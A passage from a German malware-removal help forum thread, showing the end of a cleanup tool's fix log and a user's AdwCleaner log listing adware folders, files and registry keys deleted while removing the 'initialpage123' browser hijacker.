HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB303C9B61282DE525DC754A535CA2D6A9BD3D87 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB77E5CFEC34459146748B667C97B185619251BA => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E22240E837B52E691C71DF248F12D27F96441C00 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\ED841A61C0F76025598421BC1B00E24189E68D54 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\F83099622B4A9F72CB5081F742164AD1B8D048C9 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FBB42F089AF2D570F2BF6F493D107A3255A9BB1A => Schl黶sel erfolgreich entfernt
Hosts erfolgreich wiederhergestellt.

========= RemoveProxy: =========

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => Wert erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => Wert erfolgreich entfernt
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => Wert erfolgreich entfernt
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => Wert erfolgreich entfernt
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => Wert erfolgreich entfernt
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => Wert erfolgreich entfernt
HKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => Wert erfolgreich entfernt
HKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => Wert erfolgreich entfernt
HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => Wert erfolgreich entfernt
HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => Wert erfolgreich entfernt
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => Wert erfolgreich entfernt
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => Wert erfolgreich entfernt


========= Ende von RemoveProxy: =========


========= ipconfig /flushdns =========


Windows-IP-Konfiguration

Der DNS-Aufl”sungscache wurde geleert.

========= Ende von CMD: =========


========= netsh winsock reset =========


Der Winsock-Katalog wurde zur乧kgesetzt.
Sie m乻sen den Computer neu starten, um den Vorgang abzuschlie醗n.


========= Ende von CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 30731356 B
Java, Flash, Steam htmlcache => 339396491 B
Windows/system/drivers => 277349206 B
Edge => 0 B
Chrome => 370606 B
Firefox => 750373860 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 274721 B
systemprofile32 => 226868581 B
LocalService => 12462935 B
NetworkService => 45722 B
Nick Schuster => 18298936312 B

RecycleBin => 0 B
EmptyTemp: => 18.6 GB tempor鋜e Dateien entfernt.

================================


Das System musste neu gestartet werden.

==== Ende von Fixlog 15:37:35 ====
         

Alt 05.06.2017, 17:10   #9
NexsReloaded
 
wie kann ich den  ,,initialpage123创 virus beseitigen? - Standard

wie kann ich den ,,initialpage123创 virus beseitigen?



AdwCleaner Logfile:
Code:
ATTFilter
# AdwCleaner v6.047 - Bericht erstellt am 05/06/2017 um 15:51:50
# Aktualisiert am 19/05/2017 von Malwarebytes
# Datenbank : 2017-06-02.2 [Server]
# Betriebssystem : Windows 8.1  (X64)
# Benutzername : Nick Schuster - RAZERLAP
# Gestartet von : C:\Users\Nick Schuster\Desktop\adwcleaner_6.047.exe
# Modus: L鰏chen
# Unterst黷zung : https://www.malwarebytes.com/support



***** [ Dienste ] *****



***** [ Ordner ] *****

[-] Ordner gel鰏cht: C:\ProgramData\f9d60eee-41f5-0
[-] Ordner gel鰏cht: C:\ProgramData\f9d60eee-5313-1
[-] Ordner gel鰏cht: C:\Users\Nick Schuster\AppData\Local\0D8F6370-1479923345-81E4-3884-0071C2420BD3
[-] Ordner gel鰏cht: C:\Users\Nick Schuster\AppData\Roaming\SNDA
[-] Ordner gel鰏cht: C:\Users\Nick Schuster\AppData\Roaming\Softlink
[-] Ordner gel鰏cht: C:\Users\Nick Schuster\AppData\Roaming\Enigma Software Group
[-] Ordner gel鰏cht: C:\ProgramData\7b24ec7cc000461ebe26d116b88142c8
[#] Ordner mit Neustart gel鰏cht: C:\ProgramData\Application Data\7b24ec7cc000461ebe26d116b88142c8
[-] Ordner gel鰏cht: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\System Healer
[-] Ordner gel鰏cht: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Interstatnogui
[-] Ordner gel鰏cht: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\AdvinstAnalytics
[-] Ordner gel鰏cht: C:\Users\Nick Schuster\AppData\Roaming\Mozilla\Firefox\naweriweentcofise
[-] Ordner gel鰏cht: C:\Windows\SysWOW64\sstmp
[-] Ordner gel鰏cht: C:\Windows\Update\psgo


***** [ Dateien ] *****

[-] Datei gel鰏cht: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk
[-] Datei gel鰏cht: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk
[-] Datei gel鰏cht: C:\Windows\SysNative\log\iSafeKrnlCall.log
[-] Datei gel鰏cht: C:\Windows\SysNative\bi3.exe
[-] Datei gel鰏cht: C:\Windows\SysNative\drivers\iSafeKrnlBoot.sys
[-] Datei gel鰏cht: C:\Windows\SysNative\drivers\iSafeNetFilter.sys
[-] Datei gel鰏cht: C:\TOSTACK
[-] Datei gel鰏cht: C:\Windows\SysWOW64\sh4native.exe
[-] Datei gel鰏cht: C:\Users\Public\Documents\report.dat


***** [ DLL ] *****



***** [ WMI ] *****



***** [ Verkn黳fungen ] *****



***** [ Aufgabenplanung ] *****



***** [ Registrierungsdatenbank ] *****

[-] Schl黶sel gel鰏cht: [x64] HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services\Recover
[-] Schl黶sel gel鰏cht: [x64] HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services\AppleCloudSvc
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\Prod.cap
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.001
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.002
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.003
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.004
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.005
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.006
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.007
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.008
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.009
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.01
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.010
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.011
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.012
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.013
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.014
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.015
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.016
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.017
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.018
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.019
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.02
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.020
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.021
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.022
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.023
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.024
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.025
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.026
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.027
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.028
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.029
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.03
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.030
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.031
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.032
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.033
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.034
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.035
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.036
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.037
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.038
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.039
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.04
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.040
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.041
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.042
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.043
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.044
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.045
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.046
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.047
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.048
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.049
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.05
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.050
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.051
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.052
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.053
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.054
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.055
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.056
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.057
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.058
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.059
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.06
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.060
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.061
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.062
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.063
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.064
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.065
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.066
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.067
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.068
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.069
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.07
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.070
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.071
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.072
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.073
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.074
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.075
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.076
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.077
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.078
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.079
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.08
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.080
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.081
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.082
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.083
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.084
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.085
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.086
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.087
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.088
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.089
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.09
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.090
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.091
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.092
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.093
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.094
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.095
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.096
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.097
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.098
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.099
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.7z
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.arj
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.bz2
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.cab
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.gz
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.gzip
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.iso
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.jar
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.lzh
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.rar
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.rpm
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.tar
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.tbz
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.tgz
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.wim
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.z
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\ZipTool.zip
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\Prod.cap
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.001
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.002
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.003
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.004
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.005
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.006
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.007
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.008
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.009
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.01
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.010
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.011
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.012
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.013
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.014
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.015
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.016
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.017
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.018
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.019
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.02
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.020
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.021
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.022
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.023
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.024
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.025
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.026
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.027
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.028
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.029
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.03
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.030
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.031
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.032
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.033
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.034
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.035
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.036
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.037
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.038
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.039
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.04
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.040
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.041
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.042
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.043
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.044
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.045
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.046
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.047
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.048
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.049
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.05
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.050
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.051
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.052
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.053
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.054
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.055
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.056
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.057
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.058
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.059
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.06
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.060
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.061
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.062
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.063
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.064
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.065
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.066
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.067
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.068
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.069
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.07
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.070
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.071
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.072
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.073
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.074
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.075
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.076
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.077
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.078
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.079
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.08
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.080
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.081
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.082
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.083
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.084
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.085
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.086
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.087
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.088
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.089
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.09
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.090
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.091
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.092
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.093
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.094
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.095
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.096
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.097
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.098
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.099
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.7z
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.arj
